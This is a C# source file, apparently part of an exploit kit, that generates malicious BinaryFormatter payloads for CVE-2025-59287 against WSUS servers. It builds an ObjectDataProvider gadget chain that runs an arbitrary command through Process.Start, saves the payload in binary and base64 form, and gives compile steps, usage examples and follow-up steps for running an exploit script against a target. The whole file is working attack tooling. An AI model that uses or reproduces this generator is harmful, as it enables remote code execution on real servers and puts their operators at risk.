using System; using System.IO; using System.Runtime.Serialization.Formatters.Binary; using System.Windows.Data; using System.Diagnostics; using System.Collections.ObjectModel; namespace WSUSExploit { /// /// Generates malicious BinaryFormatter payloads for CVE-2025-59287 /// This exploits ObjectDataProvider gadget chain to execute arbitrary commands /// /// Compilation: /// csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs /// /// Usage: /// BinaryFormatterPayloadGenerator.exe /// Example: BinaryFormatterPayloadGenerator.exe calc.exe /// class BinaryFormatterPayloadGenerator { static void Main(string[] args) { Console.WriteLine("=" + new string('=', 60)); Console.WriteLine("[*] CVE-2025-59287 BinaryFormatter Payload Generator"); Console.WriteLine("=" + new string('=', 60)); if (args.Length < 1) { Console.WriteLine("\nUsage: BinaryFormatterPayloadGenerator.exe "); Console.WriteLine("\nExamples:"); Console.WriteLine(" BinaryFormatterPayloadGenerator.exe calc.exe"); Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"powershell -c whoami\""); Console.WriteLine(" BinaryFormatterPayloadGenerator.exe \"cmd /c echo pwned\""); return; } string command = args[0]; Console.WriteLine($"\n[*] Generating BinaryFormatter payload for command: {command}"); try { // Create ObjectDataProvider gadget // This is a known .NET deserialization gadget that can execute arbitrary methods ObjectDataProvider objectDataProvider = new ObjectDataProvider(); objectDataProvider.MethodName = "Start"; objectDataProvider.ObjectInstance = new Process(); // Parse command into ProcessStartInfo ProcessStartInfo processStartInfo = new ProcessStartInfo(); // Handle commands with arguments if (command.Contains(" ")) { string[] parts = command.Split(new char[] { ' ' }, 2, StringSplitOptions.RemoveEmptyEntries); processStartInfo.FileName = parts[0]; if (parts.Length > 1) { processStartInfo.Arguments = parts[1]; } } else { processStartInfo.FileName = command; } processStartInfo.UseShellExecute = false; processStartInfo.CreateNoWindow = true; // Method parameters for Process.Start(ProcessStartInfo) Collection methodParameters = new Collection(); methodParameters.Add(processStartInfo); objectDataProvider.MethodParameters = methodParameters; // Serialize using BinaryFormatter BinaryFormatter formatter = new BinaryFormatter(); using (MemoryStream ms = new MemoryStream()) { formatter.Serialize(ms, objectDataProvider); byte[] payload = ms.ToArray(); // Generate filename string timestamp = DateTime.Now.ToString("yyyyMMddHHmmss"); string filename = $"payload_{timestamp}.bin"; string base64File = $"payload_{timestamp}.b64"; // Save binary payload File.WriteAllBytes(filename, payload); // Save base64 encoded version (easier to transfer) string base64Payload = Convert.ToBase64String(payload); File.WriteAllText(base64File, base64Payload); Console.WriteLine("\n[+] Payload generated successfully!"); Console.WriteLine($" Binary file: {filename}"); Console.WriteLine($" Base64 file: {base64File}"); Console.WriteLine($" Size: {payload.Length} bytes"); Console.WriteLine("\n[*] Next steps:"); Console.WriteLine($" 1. Encrypt the payload: python encrypt_payload.py {filename}"); Console.WriteLine($" 2. Or use directly: python wsus_exploit.py -t -f {filename}"); } } catch (Exception ex) { Console.WriteLine($"\n[!] Error generating payload: {ex.Message}"); Console.WriteLine(ex.StackTrace); if (ex is FileNotFoundException) { Console.WriteLine("\n[*] Make sure WindowsBase.dll is referenced during compilation"); Console.WriteLine("[*] Use: csc /reference:\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WindowsBase.dll\" BinaryFormatterPayloadGenerator.cs"); } } } } }